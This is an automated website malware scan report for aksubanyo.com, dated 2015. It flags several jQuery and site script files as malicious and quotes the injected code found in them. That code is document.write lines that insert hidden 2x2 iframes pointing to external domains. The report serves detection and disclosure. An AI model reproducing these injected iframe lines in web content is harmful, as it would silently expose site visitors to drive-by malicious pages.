Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aksubanyo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aksubanyo.com/ | 200 OK Content-Length: 9387 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?i=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?i=1497375> | ||
http://aksubanyo.com/js/jquery.min.js | 200 OK Content-Length: 72497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> | ||
http://aksubanyo.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8421 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> | ||
http://aksubanyo.com/js/aksu.js | 200 OK Content-Length: 1922 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); $(function() { $('#sdt_menu > li').bind('mouseenter',function(){ var $elem = $(this); if($sub_menu.length) $sub_menu.hide().css('left','0px'); $elem.find('.sdt_active') .stop(true) .animate({'height':'0px'},300) .andSelf().find('img') .stop(true) .animate({ 'width':'0px', 'height':'0px', 'left':'85px'},400) .andSelf() .find('.sdt_wrap') .stop(true) .animate({'top':'25px'},500); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> | ||
http://aksubanyo.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57578 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$ Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> | ||
http://aksubanyo.com/js/slide.js | 200 OK Content-Length: 690 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); $(document).ready(function() { $("#open").click(function(){ $("div#panel").slideDown("slow"); }); $("#close").click(function(){ $("div#panel").slideUp("slow"); }); $("#toggle a").click(function () { $("#toggle a").toggle(); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> | ||
http://aksubanyo.com/slayt/js/jquery.min.js | 200 OK Content-Length: 85584 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); (function(a,b){function cg(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cd(a){if(!bZ[a]){var b=d(" Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> | ||
http://gsgd.co.uk/sandbox/jquery/easing/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://aksubanyo.com/slayt/js/slides.min.jquery.js | 200 OK Content-Length: 7108 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375></iframe>'); (function(a){a.fn.slides=function(b){return b=a.extend({},a.fn.slides.option,b),this.each(function(){function w(g,h,i){if(!p&&o) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://two2readblog.com/oecd.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://two2readblog.com/oecd.html?j=1497375> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=1497375 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=1497375> | ||
http://aksubanyo.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aksubanyo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 06:05:02 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: aksubanyo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 06:05:02 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: aksubanyo.com
Referer: http://www.google.com/search?q=aksubanyo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aksubanyo.com
Referer: http://www.google.com/search?q=aksubanyo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.